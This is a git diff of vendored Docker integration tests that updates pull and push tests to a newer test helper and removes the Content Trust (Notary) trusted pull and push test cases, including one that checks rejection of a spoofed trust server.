-		if strings.HasPrefix(line, "busybox") && strings.Contains(line, "latest") {
+		if strings.HasPrefix(line, "dockercore/engine-pull-all-test-fixture") && strings.Contains(line, "latest") {
 			latestLine = line
 			break
 		}
 	}
-	c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for busybox:latest found after pulling all tags"))
+	c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for dockercore/engine-pull-all-test-fixture:latest found after pulling all tags"))
+
 	splitLatest := strings.Fields(latestLine)
 	splitCurrent := strings.Fields(splitOutImageCmd[1])
 
@@ -227,7 +228,7 @@ func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) {
 	splitCurrent[4] = ""
 	splitCurrent[5] = ""
 
-	c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("busybox:latest was changed after pulling all tags"))
+	c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("dockercore/engine-pull-all-test-fixture:latest was changed after pulling all tags"))
 }
 
 // TestPullClientDisconnect kills the client during a pull operation and verifies that the operation
@@ -243,6 +244,7 @@ func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	err = pullCmd.Start()
 	c.Assert(err, checker.IsNil)
+	go pullCmd.Wait()
 
 	// Cancel as soon as we get some output.
 	buf := make([]byte, 10)
@@ -257,18 +259,16 @@ func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) {
 	c.Assert(err, checker.NotNil, check.Commentf("image was pulled after client disconnected"))
 }
 
-func (s *DockerRegistryAuthHtpasswdSuite) TestPullNoCredentialsNotFound(c *check.C) {
-	// we don't care about the actual image, we just want to see image not found
-	// because that means v2 call returned 401 and we fell back to v1 which usually
-	// gives a 404 (in this case the test registry doesn't handle v1 at all)
-	out, _, err := dockerCmdWithError("pull", privateRegistryURL+"/busybox")
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Error: image busybox:latest not found")
-}
-
 // Regression test for https://github.com/docker/docker/issues/26429
 func (s *DockerSuite) TestPullLinuxImageFailsOnWindows(c *check.C) {
 	testRequires(c, DaemonIsWindows, Network)
 	_, _, err := dockerCmdWithError("pull", "ubuntu")
+	c.Assert(err.Error(), checker.Contains, "no matching manifest")
+}
+
+// Regression test for https://github.com/docker/docker/issues/28892
+func (s *DockerSuite) TestPullWindowsImageFailsOnLinux(c *check.C) {
+	testRequires(c, DaemonIsLinux, Network)
+	_, _, err := dockerCmdWithError("pull", "microsoft/nanoserver")
 	c.Assert(err.Error(), checker.Contains, "cannot be used on this platform")
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go
deleted file mode 100644
index 96a42d6758..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go
+++ /dev/null
@@ -1,365 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"io/ioutil"
-	"os/exec"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerTrustSuite) TestTrustedPull(c *check.C) {
-	repoName := s.setupTrustedImage(c, "trusted-pull")
-
-	// Try pull
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err := runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
-
-	dockerCmd(c, "rmi", repoName)
-	// Try untrusted pull to ensure we pushed the tag to the registry
-	pullCmd = exec.Command(dockerBinary, "pull", "--disable-content-trust=true", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out))
-
-}
-
-func (s *DockerTrustSuite) TestTrustedIsolatedPull(c *check.C) {
-	repoName := s.setupTrustedImage(c, "trusted-isolated-pull")
-
-	// Try pull (run from isolated directory without trust information)
-	pullCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated", "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err := runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(string(out)))
-
-	dockerCmd(c, "rmi", repoName)
-}
-
-func (s *DockerTrustSuite) TestUntrustedPull(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockercliuntrusted/pulltest:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-	dockerCmd(c, "push", repoName)
-	dockerCmd(c, "rmi", repoName)
-
-	// Try trusted pull on untrusted tag
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err := runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestPullWhenCertExpired(c *check.C) {
-	c.Skip("Currently changes system time, causing instability")
-	repoName := s.setupTrustedImage(c, "trusted-cert-expired")
-
-	// Certificates have 10 years of expiration
-	elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11)
-
-	runAtDifferentDate(elevenYearsFromNow, func() {
-		// Try pull
-		pullCmd := exec.Command(dockerBinary, "pull", repoName)
-		s.trustedCmd(pullCmd)
-		out, _, err := runCommandWithOutput(pullCmd)
-
-		c.Assert(err, check.NotNil, check.Commentf(out))
-		c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf(out))
-	})
-
-	runAtDifferentDate(elevenYearsFromNow, func() {
-		// Try pull
-		pullCmd := exec.Command(dockerBinary, "pull", "--disable-content-trust", repoName)
-		s.trustedCmd(pullCmd)
-		out, _, err := runCommandWithOutput(pullCmd)
-
-		c.Assert(err, check.IsNil, check.Commentf(out))
-		c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out))
-	})
-}
-
-func (s *DockerTrustSuite) TestTrustedPullFromBadTrustServer(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclievilpull/trusted:latest", privateRegistryURL)
-	evilLocalConfigDir, err := ioutil.TempDir("", "evil-local-config-dir")
-	if err != nil {
-		c.Fatalf("Failed to create local temp dir")
-	}
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out))
-	dockerCmd(c, "rmi", repoName)
-
-	// Try pull
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
-	dockerCmd(c, "rmi", repoName)
-
-	// Kill the notary server, start a new "evil" one.
-	s.not.Close()
-	s.not, err = newTestNotary(c)
-
-	c.Assert(err, check.IsNil, check.Commentf("Restarting notary server failed."))
-
-	// In order to make an evil server, lets re-init a client (with a different trust dir) and push new data.
-	// tag an image and upload it to the private registry
-	dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName)
-
-	// Push up to the new server
-	pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err = runCommandWithOutput(pushCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out))
-
-	// Now, try pulling with the original client from this new trust server. This should fail because the new root is invalid.
-	pullCmd = exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	if err == nil {
-		c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out)
-	}
-	if !strings.Contains(out, "could not rotate trust to a new trusted root") {
-		c.Fatalf("Missing expected output on trusted pull:\n%s", out)
-	}
-}
-
-func (s *DockerTrustSuite) TestTrustedPullWithExpiredSnapshot(c *check.C) {
-	c.Skip("Currently changes system time, causing instability")
-	repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppull/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	// Push with default passphrases
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out))
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Snapshots last for three years. This should be expired
-	fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4)
-
-	runAtDifferentDate(fourYearsLater, func() {
-		// Try pull
-		pullCmd := exec.Command(dockerBinary, "pull", repoName)
-		s.trustedCmd(pullCmd)
-		out, _, err = runCommandWithOutput(pullCmd)
-
-		c.Assert(err, check.NotNil, check.Commentf("Missing expected error running trusted pull with expired snapshots"))
-		c.Assert(string(out), checker.Contains, "repository out-of-date", check.Commentf(out))
-	})
-}
-
-func (s *DockerTrustSuite) TestTrustedOfflinePull(c *check.C) {
-	repoName := s.setupTrustedImage(c, "trusted-offline-pull")
-
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver")
-	out, _, err := runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "error contacting notary server", check.Commentf(out))
-	// Do valid trusted pull to warm cache
-	pullCmd = exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Try pull again with invalid notary server, should use cache
-	pullCmd = exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver")
-	out, _, err = runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestTrustedPullDelete(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, "trusted-pull-delete")
-	// tag the image and upload it to the private registry
-	_, err := buildImage(repoName, `
-                    FROM busybox
-                    CMD echo trustedpulldelete
-                `, true)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted push: %s\n%s", err, out)
-	}
-	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	if out, status := dockerCmd(c, "rmi", repoName); status != 0 {
-		c.Fatalf("Error removing image %q\n%s", repoName, out)
-	}
-
-	// Try pull
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	matches := digestRegex.FindStringSubmatch(out)
-	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out))
-	pullDigest := matches[1]
-
-	imageID := inspectField(c, repoName, "Id")
-
-	imageByDigest := repoName + "@" + pullDigest
-	byDigestID := inspectField(c, imageByDigest, "Id")
-
-	c.Assert(byDigestID, checker.Equals, imageID)
-
-	// rmi of tag should also remove the digest reference
-	dockerCmd(c, "rmi", repoName)
-
-	_, err = inspectFieldWithError(imageByDigest, "Id")
-	c.Assert(err, checker.NotNil, check.Commentf("digest reference should have been removed"))
-
-	_, err = inspectFieldWithError(imageID, "Id")
-	c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted"))
-}
-
-func (s *DockerTrustSuite) TestTrustedPullReadsFromReleasesRole(c *check.C) {
-	testRequires(c, NotaryHosting)
-	repoName := fmt.Sprintf("%v/dockerclireleasesdelegationpulling/trusted", privateRegistryURL)
-	targetName := fmt.Sprintf("%s:latest", repoName)
-
-	// Push with targets first, initializing the repo
-	dockerCmd(c, "tag", "busybox", targetName)
-	pushCmd := exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	s.assertTargetInRoles(c, repoName, "latest", "targets")
-
-	// Try pull, check we retrieve from targets role
-	pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "retrieving target for targets role")
-
-	// Now we'll create the releases role, and try pushing and pulling
-	s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public)
-	s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private)
-	s.notaryPublish(c, repoName)
-
-	// try a pull, check that we can still pull because we can still read the
-	// old tag in the targets role
-	pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "retrieving target for targets role")
-
-	// try a pull -a, check that it succeeds because we can still pull from the
-	// targets role
-	pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	// Push, should sign with targets/releases
-	dockerCmd(c, "tag", "busybox", targetName)
-	pushCmd = exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err = runCommandWithOutput(pushCmd)
-	s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases")
-
-	// Try pull, check we retrieve from targets/releases role
-	pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(out, checker.Contains, "retrieving target for targets/releases role")
-
-	// Create another delegation that we'll sign with
-	s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[1].Public)
-	s.notaryImportKey(c, repoName, "targets/other", s.not.keys[1].Private)
-	s.notaryPublish(c, repoName)
-
-	dockerCmd(c, "tag", "busybox", targetName)
-	pushCmd = exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err = runCommandWithOutput(pushCmd)
-	s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases", "targets/other")
-
-	// Try pull, check we retrieve from targets/releases role
-	pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(out, checker.Contains, "retrieving target for targets/releases role")
-}
-
-func (s *DockerTrustSuite) TestTrustedPullIgnoresOtherDelegationRoles(c *check.C) {
-	testRequires(c, NotaryHosting)
-	repoName := fmt.Sprintf("%v/dockerclipullotherdelegation/trusted", privateRegistryURL)
-	targetName := fmt.Sprintf("%s:latest", repoName)
-
-	// We'll create a repo first with a non-release delegation role, so that when we
-	// push we'll sign it into the delegation role
-	s.notaryInitRepo(c, repoName)
-	s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public)
-	s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private)
-	s.notaryPublish(c, repoName)
-
-	// Push should write to the delegation role, not targets
-	dockerCmd(c, "tag", "busybox", targetName)
-	pushCmd := exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	s.assertTargetInRoles(c, repoName, "latest", "targets/other")
-	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
-
-	// Try pull - we should fail, since pull will only pull from the targets/releases
-	// role or the targets role
-	pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "No trust data for")
-
-	// try a pull -a: we should fail since pull will only pull from the targets/releases
-	// role or the targets role
-	pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "No trusted tags for")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go
index f750c12674..01ad829192 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go
@@ -7,16 +7,14 @@ import (
 	"net/http"
 	"net/http/httptest"
 	"os"
-	"os/exec"
-	"path/filepath"
 	"strings"
 	"sync"
-	"time"
 
 	"github.com/docker/distribution/reference"
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 // Pushing an image to a private registry.
@@ -134,13 +132,13 @@ func testPushEmptyLayer(c *check.C) {
 	c.Assert(err, check.IsNil, check.Commentf("Could not open test tarball"))
 	defer freader.Close()
 
-	importCmd := exec.Command(dockerBinary, "import", "-", repoName)
-	importCmd.Stdin = freader
-	out, _, err := runCommandWithOutput(importCmd)
-	c.Assert(err, check.IsNil, check.Commentf("import failed: %q", out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "import", "-", repoName},
+		Stdin:   freader,
+	}).Assert(c, icmd.Success)
 
 	// Now verify we can push it
-	out, _, err = dockerCmdWithError("push", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
 	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out))
 }
 
@@ -157,17 +155,16 @@ func (s *DockerSchema1RegistrySuite) TestPushEmptyLayer(c *check.C) {
 func testConcurrentPush(c *check.C) {
 	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
 
-	repos := []string{}
+	var repos []string
 	for _, tag := range []string{"push1", "push2", "push3"} {
 		repo := fmt.Sprintf("%v:%v", repoName, tag)
-		_, err := buildImage(repo, fmt.Sprintf(`
+		buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(`
 	FROM busybox
 	ENTRYPOINT ["/bin/echo"]
 	ENV FOO foo
 	ENV BAR bar
 	CMD echo %s
-`, repo), true)
-		c.Assert(err, checker.IsNil)
+`, repo)))
 		repos = append(repos, repo)
 	}
 
@@ -176,8 +173,8 @@ func testConcurrentPush(c *check.C) {
 
 	for _, repo := range repos {
 		go func(repo string) {
-			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "push", repo))
-			results <- err
+			result := icmd.RunCommand(dockerBinary, "push", repo)
+			results <- result.Error
 		}(repo)
 	}
 
@@ -281,337 +278,6 @@ func (s *DockerSchema1RegistrySuite) TestCrossRepositoryLayerPushNotSupported(c
 	c.Assert(out3, check.Equals, "hello world")
 }
 
-func (s *DockerTrustSuite) TestTrustedPush(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclitrusted/pushtest:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
-
-	// Try pull after push
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
-
-	// Assert that we rotated the snapshot key to the server by checking our local keystore
-	contents, err := ioutil.ReadDir(filepath.Join(cliconfig.ConfigDir(), "trust/private/tuf_keys", privateRegistryURL, "dockerclitrusted/pushtest"))
-	c.Assert(err, check.IsNil, check.Commentf("Unable to read local tuf key files"))
-	// Check that we only have 1 key (targets key)
-	c.Assert(contents, checker.HasLen, 1)
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithEnvPasswords(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclienv/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmdWithPassphrases(pushCmd, "12345678", "12345678")
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
-
-	// Try pull after push
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithFailingServer(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclitrusted/failingserver:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	// Using a name that doesn't resolve to an address makes this test faster
-	s.trustedCmdWithServer(pushCmd, "https://server.invalid:81/")
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.NotNil, check.Commentf("Missing error while running trusted push w/ no server"))
-	c.Assert(out, checker.Contains, "error contacting notary server", check.Commentf("Missing expected output on trusted push"))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithoutServerAndUntrusted(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclitrusted/trustedandnot:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", "--disable-content-trust", repoName)
-	// Using a name that doesn't resolve to an address makes this test faster
-	s.trustedCmdWithServer(pushCmd, "https://server.invalid")
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push with no server and --disable-content-trust failed: %s\n%s", err, out))
-	c.Assert(out, check.Not(checker.Contains), "Error establishing connection to notary repository", check.Commentf("Missing expected output on trusted push with --disable-content-trust:"))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithExistingTag(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclitag/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-	dockerCmd(c, "push", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
-
-	// Try pull after push
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithExistingSignedTag(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclipushpush/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	// Do a trusted push
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
-
-	// Do another trusted push
-	pushCmd = exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err = runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Try pull to ensure the double push did not break our ability to pull
-	pullCmd := exec.Command(dockerBinary, "pull", repoName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf("Error running trusted pull: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted pull with --disable-content-trust"))
-
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithIncorrectPassphraseForNonRoot(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockercliincorretpwd/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	// Push with default passphrases
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out))
-
-	// Push with wrong passphrases
-	pushCmd = exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmdWithPassphrases(pushCmd, "12345678", "87654321")
-	out, _, err = runCommandWithOutput(pushCmd)
-	c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with short targets passphrase: \n%s", out))
-	c.Assert(out, checker.Contains, "could not find necessary signing keys", check.Commentf("Missing expected output on trusted push with short targets/snapsnot passphrase"))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithExpiredSnapshot(c *check.C) {
-	c.Skip("Currently changes system time, causing instability")
-	repoName := fmt.Sprintf("%v/dockercliexpiredsnapshot/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	// Push with default passphrases
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
-
-	// Snapshots last for three years. This should be expired
-	fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4)
-
-	runAtDifferentDate(fourYearsLater, func() {
-		// Push with wrong passphrases
-		pushCmd = exec.Command(dockerBinary, "push", repoName)
-		s.trustedCmd(pushCmd)
-		out, _, err = runCommandWithOutput(pushCmd)
-		c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with expired snapshot: \n%s", out))
-		c.Assert(out, checker.Contains, "repository out-of-date", check.Commentf("Missing expected output on trusted push with expired snapshot"))
-	})
-}
-
-func (s *DockerTrustSuite) TestTrustedPushWithExpiredTimestamp(c *check.C) {
-	c.Skip("Currently changes system time, causing instability")
-	repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppush/trusted:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	// Push with default passphrases
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
-
-	// The timestamps expire in two weeks. Lets check three
-	threeWeeksLater := time.Now().Add(time.Hour * 24 * 21)
-
-	// Should succeed because the server transparently re-signs one
-	runAtDifferentDate(threeWeeksLater, func() {
-		pushCmd := exec.Command(dockerBinary, "push", repoName)
-		s.trustedCmd(pushCmd)
-		out, _, err := runCommandWithOutput(pushCmd)
-		c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out))
-		c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with expired timestamp"))
-	})
-}
-
